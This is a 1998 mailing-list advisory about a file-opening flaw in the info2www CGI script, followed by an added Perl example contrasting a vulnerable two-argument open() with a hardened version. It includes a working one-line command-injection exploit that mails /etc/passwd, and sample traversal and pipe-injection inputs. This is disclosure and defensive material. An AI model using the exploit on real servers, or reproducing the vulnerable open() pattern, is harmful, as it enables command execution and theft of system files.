Vulnerabilities in some versions of info2www CGI

From: Niall Smart (njs3at_private)
Date: Tue Mar 03 1998 - 03:26:49 PST


    Hi,
    
    Some versions of the info2www CGI blindly open files:
    
    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
    $
    You have new mail.
    $
    
    Trying to track down which versions of info2www have this bug and which
    don't has been difficult; there are lots of variants out there, some
    of which aren't vulnerable.  Instead of trying to make a list of versions
    which are vulnerable I'll just say that:
    
     - if it has no version number, it's probably vulnerable
     - the uuencoded version at CPAN is corrupt, and the one
       which the README file tells you to get is vulnerable
     - version 1.1 is vulnerable
     - version 1.2.x seems ok (but I'm no perl expert)
    
    Apparently info2www is based on info2html and infogate, so these may
    have problems too.
    
    Niall
    
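Added illustration, not info2www's own code: the class of bug described above comes from Perl's two-argument open(), where a "|" at the end of a user-supplied name turns the open into a command pipe. The block contrasts that pattern with a three-argument open() behind an allow-list; the directory name, function names and sample inputs are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example (not from info2www): blind 2-arg open() beside a checked
# 3-arg open(), for a CGI that maps a query-string name onto an info file.
use strict;
use warnings;
use File::Spec;

# Hypothetical info directory, constructed for the example.
my $INFO_DIR = "/usr/share/info";

# Vulnerable pattern: the name comes straight from the query string.
# With a trailing "|" Perl's 2-arg open treats the name as a command to
# run and reads its output, instead of opening a file of that name.
sub open_blindly {
    my ($name) = @_;
    open(my $fh, $name) or return;   # BAD: the mode is parsed out of $name
    return $fh;
}

# Hardened pattern: accept only a plain basename, refuse "." and "..",
# and build the path ourselves so no "/", "|" or metacharacter survives.
sub safe_info_path {
    my ($name) = @_;
    return unless defined $name && $name =~ /\A([A-Za-z0-9_.-]+)\z/;
    my $base = $1;
    return if $base =~ /\A\.{1,2}\z/;            # "." and ".." are not files
    return File::Spec->catfile($INFO_DIR, $base);
}

sub open_checked {
    my ($name) = @_;
    my $path = safe_info_path($name) or return;
    open(my $fh, '<', $path) or return;   # '<' is fixed; $path is data only
    return $fh;
}

# Constructed inputs: a normal name, a traversal attempt and a pipe attempt.
# Only the validator runs here; nothing is opened for the rejected names.
for my $q ("gcc", "../../etc/passwd", "(../../bin/mail x|)") {
    printf "%-24s %s\n", $q, defined safe_info_path($q) ? "accepted" : "rejected";
}
```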